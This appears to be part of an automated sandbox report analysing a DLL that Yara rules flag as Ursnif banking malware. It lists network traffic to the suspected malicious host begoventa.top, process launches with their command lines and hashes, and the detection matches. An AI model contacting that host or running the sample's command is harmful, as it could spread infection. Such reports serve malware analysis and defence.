                        Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        1192.168.2.44977192.38.132.18180C:\Program Files (x86)\Internet Explorer\iexplore.exe
                        TimestampkBytes transferredDirectionData
                        Jan 11, 2021 19:19:59.374355078 CET4752OUTGET /favicon.ico HTTP/1.1
                        Accept: */*
                        Accept-Encoding: gzip, deflate
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                        Host: begoventa.top
                        Connection: Keep-Alive
                        Jan 11, 2021 19:19:59.539839983 CET4753INHTTP/1.0 503 Service Unavailable
                        Cache-Control: no-cache
                        Connection: close
                        Content-Type: text/html
                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                        Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                        Code Manipulations

                        Statistics

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Start time:19:17:20
                        Start date:11/01/2021
                        Path:C:\Windows\System32\loaddll32.exe
                        Wow64 process (32bit):true
                        Commandline:loaddll32.exe 'C:\Users\user\Desktop\OgQJzDbLce.dll'
                        Imagebase:0xb00000
                        File size:120832 bytes
                        MD5 hash:2D39D4DFDE8F7151723794029AB8A034
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.777109164.0000000003AD8000.00000004.00000040.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.776993803.0000000003AD8000.00000004.00000040.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.777131098.0000000003AD8000.00000004.00000040.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.777071428.0000000003AD8000.00000004.00000040.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.777173919.0000000003AD8000.00000004.00000040.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.777044888.0000000003AD8000.00000004.00000040.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.777196001.0000000003AD8000.00000004.00000040.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.777154030.0000000003AD8000.00000004.00000040.sdmp, Author: Joe Security
                        Reputation:moderate

                        General

                        Start time:19:18:14
                        Start date:11/01/2021
                        Path:C:\Program Files\internet explorer\iexplore.exe
                        Wow64 process (32bit):false
                        Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                        Imagebase:0x7ff70f2b0000
                        File size:823560 bytes
                        MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Start time:19:18:14
                        Start date:11/01/2021
                        Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                        Wow64 process (32bit):true
                        Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6572 CREDAT:17410 /prefetch:2
                        Imagebase:0x260000
                        File size:822536 bytes
                        MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Start time:19:18:57
                        Start date:11/01/2021
                        Path:C:\Program Files\internet explorer\iexplore.exe
                        Wow64 process (32bit):false
                        Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                        Imagebase:0x7ff70f2b0000
                        File size:823560 bytes
                        MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Start time:19:18:58
                        Start date:11/01/2021
                        Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                        Wow64 process (32bit):true
                        Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6392 CREDAT:17410 /prefetch:2
                        Imagebase:0x260000
                        File size:822536 bytes
                        MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Start time:19:19:34
                        Start date:11/01/2021
                        Path:C:\Program Files\internet explorer\iexplore.exe
                        Wow64 process (32bit):false
                        Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                        Imagebase:0x7ff70f2b0000
                        File size:823560 bytes
                        MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Start time:19:19:34
                        Start date:11/01/2021
                        Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                        Wow64 process (32bit):true
                        Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3480 CREDAT:17410 /prefetch:2
                        Imagebase:0x260000
                        File size:822536 bytes
                        MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Start time:19:19:57
                        Start date:11/01/2021
                        Path:C:\Program Files\internet explorer\iexplore.exe
                        Wow64 process (32bit):false
                        Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                        Imagebase:0x7ff70f2b0000
                        File size:823560 bytes
                        MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Start time:19:19:57
                        Start date:11/01/2021
                        Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                        Wow64 process (32bit):true
                        Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6128 CREDAT:17410 /prefetch:2
                        Imagebase:0x260000
                        File size:822536 bytes
                        MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Disassembly

                        Code Analysis

                        Reset < >